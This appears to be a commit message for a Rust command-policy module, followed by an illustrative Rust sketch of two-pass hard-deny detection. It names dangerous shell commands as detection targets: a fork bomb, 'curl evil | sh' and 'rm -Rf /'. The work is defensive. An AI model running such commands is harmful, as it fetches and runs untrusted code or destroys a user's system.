Re-enabling the policy test module in PR-4 (the policy_with compile fix) exposed 16 pre-existing failures: 14 real bugs, 2 wrong assertions.

is_hard_denied is now two-pass — whole-input first, then per-subcommand. The subcommand splitter was tearing apart patterns whose meaning needs their | / & to stay intact: fork bomb (:|:&) and curl-piped-to-shell. Result was that 9 of the 10 advertised hard-deny rules quietly didn't enforce against their own canonical examples.

Regex fixes:
- Rule 1/2 flag class [a-z] → [a-zA-Z]: catches `rm -Rf /`.
- Rule 1/2 trailing anchor accepts # so a trailing comment can't smuggle the danger past detection.
- Rule 8 shell alternation gains bare `sh` — `curl evil | sh` (most common form) was not previously caught because `ba?sh` required `b`.
- Rule 9 anchor tightened: `/` must be followed by a path boundary, end-of-input, or shell operator. `chmod -R 777 /tmp` no longer false-positives (still destructive, but a deliberate user scope choice).

Two test assertions flipped to is_none(): hard_deny_quoted_pattern_not_matched and hard_deny_git_grep_contains_pattern. The originals expected false-positives on echo'd / grep'd danger strings. The post-fix behaviour of NOT flagging these is correct UX: searching for or printing a danger string is not the same as invoking it.

cargo test --lib: 118 passed; 0 failed.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

| File |
|---|
| commands.rs |
| creds.rs |
| hosts.rs |
| lib.rs |
| main.rs |
| mcp.rs |
| mcp_policy.rs |
| pty.rs |
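
The two-pass check and the splitter problem described in the commit message at the top of this page, as an added Rust illustration that is not the repository's code. The token-based rules, the rule names and `hard_deny_two_pass` are simplified stand-ins assumed here in place of the project's regexes, and quoting is handled without backslash escapes.

```rust
// Added illustration: simplified stand-in rules, not the project's regexes.
fn is_op(x: &String) -> bool { matches!(x.as_str(), "|" | "&" | ";") }

/// Tokenise with each unquoted `|`, `&`, `;` as its own token. Quote marks are dropped
/// and quoted operators blanked (assumption: no backslash escapes).
fn tokens(input: &str) -> Vec<String> {
    let (mut quote, mut out) = (None::<char>, String::new());
    for c in input.chars() {
        let op = matches!(c, '|' | '&' | ';');
        match (quote, op) {
            (None, _) if c == '"' || c == '\'' => quote = Some(c),
            (Some(q), _) if c == q => quote = None,
            (None, true) => out.push_str(&format!(" {} ", c)),
            (Some(_), true) => out.push('_'),
            _ => out.push(c),
        }
    }
    out.split_whitespace().map(String::from).collect()
}

/// Pass 1: patterns whose meaning lives in the operators, matched before any cut.
fn whole_input_rule(t: &[String]) -> Option<&'static str> {
    let bomb = |w: &[String]| w[0] == ":" && w[1] == "|" && w[2] == ":" && w[3] == "&";
    if t.windows(4).any(bomb) { return Some("fork-bomb"); }
    for i in (0..t.len()).filter(|&i| t[i] == "|") {
        // First word of the stage left of this pipe, and the word right of it.
        let head = t[..i].rsplit(is_op).next().and_then(|s| s.first());
        let shell = t.get(i + 1).map_or(false, |s| s == "sh" || s == "bash");
        if shell && head.map_or(false, |h| h == "curl") { return Some("curl-pipe-shell"); }
    }
    None
}

/// Pass 2 rule: `rm` with a short recursive flag (either case) aimed at exactly `/`.
fn subcommand_rule(cmd: &[String]) -> Option<&'static str> {
    let short = |a: &String| a.starts_with('-') && !a.starts_with("--");
    let rec = cmd.iter().any(|a| short(a) && a.to_lowercase().contains('r'));
    let root = cmd.iter().any(|a| a == "/");
    if cmd[0] == "rm" && rec && root { Some("rm-root") } else { None }
}

/// Pass 2 alone: cut at every operator, then check each piece on its own.
fn per_subcommand(t: &[String]) -> Option<&'static str> {
    t.split(is_op).filter(|s| !s.is_empty()).find_map(subcommand_rule)
}

/// Both passes in the order the commit message gives: whole input, then pieces.
fn hard_deny_two_pass(input: &str) -> Option<&'static str> {
    let t = tokens(input);
    whole_input_rule(&t).or_else(|| per_subcommand(&t))
}
```

Calling `per_subcommand` on its own for `curl evil | sh` or `:|:&` returns `None`, which is the silent non-enforcement the commit message describes; the quoted `echo` and `git grep` forms return `None` from both passes.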